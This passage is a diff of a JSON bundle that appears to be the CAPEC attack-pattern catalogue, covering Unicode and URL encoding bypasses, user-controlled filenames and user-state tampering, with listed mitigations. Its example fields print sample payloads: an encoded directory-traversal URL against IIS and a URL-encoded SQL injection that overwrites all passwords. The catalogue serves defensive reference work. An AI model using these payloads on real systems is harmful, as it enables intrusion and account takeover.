"2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e2b0963d-8270-471a-ac99-09cdfa1f48a1", - "source_ref": "course-of-action--580ff04e-6f08-4cfb-b111-36f44d88a6d3", + "id": "relationship--44c86cc6-d5b3-4aba-a9e1-a8996a5711b1", + "source_ref": "course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac", "relationship_type": "mitigates", - "target_ref": "attack-pattern--74222e4e-7b16-4b61-a9da-3b22a3411413" + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--109e986e-78a3-4e1b-84d6-9d52b0413f58", - "source_ref": "course-of-action--c176b755-92bf-4e0a-811c-48b7014611c7", + "id": "relationship--94ce1a99-d4d8-479e-bcb5-d153a4d61f79", + "source_ref": "course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--74222e4e-7b16-4b61-a9da-3b22a3411413" + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95" }, { "name": "Using Unicode Encoding to Bypass Validation Logic", "description": "An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -41446,78 +42150,79 @@ "\n Attack Example: Unicode Encodings in the IIS Server\n A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is\n http://target.server/some_directory/../../../winnt\n In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.\n In October 2000, an adversary publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are\n . yields C0 AE/ yields C0 AF\\ yields C1 9C\n Using this conversion, the previously displayed URL can be encoded as\n http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winntSee also: CVE-2000-0884" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--70243c60-3213-405c-81c3-5f5e22dfd632" + "id": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-71-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.", "type": "course-of-action", - "id": "course-of-action--c9f188a4-ac2e-4d9f-b7bb-ab778f809e2f" + "id": "course-of-action--21ed7193-3366-410a-8a54-f78088f80cca" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--81459b54-e5c6-497d-b7d0-35efc08b77de", - "source_ref": "course-of-action--c9f188a4-ac2e-4d9f-b7bb-ab778f809e2f", + "id": "relationship--a5feef4d-dd12-465c-a1f4-54a66811f051", + "source_ref": "course-of-action--21ed7193-3366-410a-8a54-f78088f80cca", "relationship_type": "mitigates", - "target_ref": "attack-pattern--70243c60-3213-405c-81c3-5f5e22dfd632" + "target_ref": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-71-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that filtering or input validation is applied to canonical data.", "type": "course-of-action", - "id": "course-of-action--b611dc8e-548f-4fa1-aac8-5575737a1458" + "id": "course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--94ef1ff5-6fd0-406f-a1f8-1ba824c9e3d9", - "source_ref": "course-of-action--b611dc8e-548f-4fa1-aac8-5575737a1458", + "id": "relationship--91f8ddb2-7263-40a3-8ec1-becbc72ff0ee", + "source_ref": "course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad", "relationship_type": "mitigates", - "target_ref": "attack-pattern--70243c60-3213-405c-81c3-5f5e22dfd632" + "target_ref": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--65469fc3-fc99-4e04-baa0-f6fdc064f66e", - "source_ref": "course-of-action--7d4c1c31-423f-4ba2-a07a-9bbd8dd662dd", + "id": "relationship--b43a9a55-d2a6-43fb-a6a2-a6dd5eda77b5", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", "relationship_type": "mitigates", - "target_ref": "attack-pattern--70243c60-3213-405c-81c3-5f5e22dfd632" + "target_ref": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d" }, { "name": "URL Encoding", "description": "This attack targets the encoding of the URL. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an attacker may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -41646,118 +42351,119 @@ "\n SQL Injection\n \n Original database query in the example file - \"login.asp\":SQLQuery = \"SELECT preferences FROM logintable WHERE userid='\" & Request.QueryString(\"userid\") & \"' AND password='\" & Request.QueryString(\"password\") & \"';\"\n \n URL-encoded attack:http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00\n \n Executed database query:SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d';\n From \"URL encoded attacks\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "id": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e64e45d7-2672-4a6b-8361-24f38a8b8987", - "source_ref": "course-of-action--8d8aa558-cac2-4d1b-b1e1-a11915a268b8", + "id": "relationship--20e8b9af-45d9-40b4-89e6-3795e035f51b", + "source_ref": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--744429df-792d-49b0-81b5-9fe5711a5cc9", - "source_ref": "course-of-action--241842ea-2c29-4aa0-b497-a6a41f2fde99", + "id": "relationship--8d51a424-be03-4360-86e5-8b52593e1b9d", + "source_ref": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9f1e2565-1b4d-4418-b55c-d7d1ad63bf52", - "source_ref": "course-of-action--8d8baedc-2a15-425c-8760-dcb501c425c9", + "id": "relationship--aa8b1d29-f699-40ae-ae85-528d22562479", + "source_ref": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--305723cc-4de1-4c4e-ac20-6a8fdd464c77", - "source_ref": "course-of-action--7ca1b98c-a3d7-4859-a784-75ff258765c8", + "id": "relationship--45615c94-2b28-49fb-8516-b529a389c8e8", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a1cc552e-2d03-4840-a7a4-aef18203a3c7", - "source_ref": "course-of-action--e30069ef-47f0-4bad-a1ca-881c17cd8c30", + "id": "relationship--8f235db5-fa5f-4639-8f92-66ee13f93eca", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-72-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)", "type": "course-of-action", - "id": "course-of-action--597a29ba-0e45-465e-8db7-eea95a8e8141" + "id": "course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a19e0e2a-da7c-469c-815e-891771aaf753", - "source_ref": "course-of-action--597a29ba-0e45-465e-8db7-eea95a8e8141", + "id": "relationship--ca6ddc66-5dac-4b75-8d8d-e0e6afed9e7c", + "source_ref": "course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7c1f327c-4a82-45b1-b7a9-1af1c0bd7e9a", - "source_ref": "course-of-action--137932dd-0498-4500-9a8b-ff29e913a1f3", + "id": "relationship--0c670e55-6327-4cc7-a383-353905982408", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2530b5a9-3cdf-4da6-a604-4b774a800e5e" + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9" }, { "name": "User-Controlled Filename", "description": "An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -41848,105 +42554,106 @@ "Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d6cff4db-5c35-4436-9d69-fc5063fb3127" + "id": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--19c4ba20-de37-490f-9923-5db896db1073", - "source_ref": "course-of-action--d8c851f4-9464-4d22-b6a5-8e817e3754d1", + "id": "relationship--9fa5c9f5-e86e-4150-86a2-9e4681532661", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d6cff4db-5c35-4436-9d69-fc5063fb3127" + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c1aac62e-0a27-4080-ab0b-2020735a36db", - "source_ref": "course-of-action--f3bd3d55-f25e-4bff-b92b-5a1b421a1975", + "id": "relationship--a62a21f8-c485-4c1e-9f87-9b46d915c0cd", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d6cff4db-5c35-4436-9d69-fc5063fb3127" + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a5538622-6272-47c0-acea-95ce02c7e891", - "source_ref": "course-of-action--973c207c-2784-4f0c-98e8-0ac062857549", + "id": "relationship--edd38d2f-4f92-4c3a-9d39-82a5810b2cd5", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d6cff4db-5c35-4436-9d69-fc5063fb3127" + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--47912c22-2d6c-4bf7-aca6-61cd975b0ddb", - "source_ref": "course-of-action--c4397106-6835-4ce6-b6e4-80a636d6f5a8", + "id": "relationship--e74697e0-2f05-4c6e-aee7-ce34e30ac2a0", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d6cff4db-5c35-4436-9d69-fc5063fb3127" + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--064e068f-215b-4c4a-b837-e7cb90ee52c7", - "source_ref": "course-of-action--4bdc152c-7111-4d9d-872a-6c9579ddb87c", + "id": "relationship--79de9748-e935-49a4-b7ed-2962df30e2f5", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d6cff4db-5c35-4436-9d69-fc5063fb3127" + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-73-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Scan dynamically generated content against validation specification", "type": "course-of-action", - "id": "course-of-action--313851cc-f27d-43b9-8d96-656d20c4c5fd" + "id": "course-of-action--882b19e3-3b15-46be-addd-876476f8e56d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--84ff6d0d-c63a-4631-ab63-37334fd85f64", - "source_ref": "course-of-action--313851cc-f27d-43b9-8d96-656d20c4c5fd", + "id": "relationship--679bcb7d-a2f7-4a35-8a99-323da9bfcc6f", + "source_ref": "course-of-action--882b19e3-3b15-46be-addd-876476f8e56d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d6cff4db-5c35-4436-9d69-fc5063fb3127" + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537" }, { "name": "Manipulating User State", "description": "The adversary modifies state information maintained by the target software in user-accessible locations. If successful, the target software will use this tainted state information and execute in an unintended manner. State management is an important function within an application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -42012,93 +42719,94 @@ "\n During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.\n An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application.\n " ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b85cd921-db82-4e63-8160-31756ce415d7" + "id": "attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-74-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.", "type": "course-of-action", - "id": "course-of-action--4a6e00b1-2808-42fc-aa09-9f7767145c3d" + "id": "course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1c76059d-9231-4b64-a1b3-e3ff0465dc2a", - "source_ref": "course-of-action--4a6e00b1-2808-42fc-aa09-9f7767145c3d", + "id": "relationship--d9848bd9-0bf1-4cd7-a54d-6705d22774da", + "source_ref": "course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b85cd921-db82-4e63-8160-31756ce415d7" + "target_ref": "attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-74-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.", "type": "course-of-action", - "id": "course-of-action--e8c17b00-31db-486a-a762-a6407893c58a" + "id": "course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ab45c2c0-2a53-4f5d-8b8d-d1e21846dd17", - "source_ref": "course-of-action--e8c17b00-31db-486a-a762-a6407893c58a", + "id": "relationship--a05b8a5c-7e75-4870-8aef-4e433c3e2a87", + "source_ref": "course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b85cd921-db82-4e63-8160-31756ce415d7" + "target_ref": "attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-74-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.", "type": "course-of-action", - "id": "course-of-action--cdb6a2bd-e1b8-4d54-b997-fe0d6ed778e9" + "id": "course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - 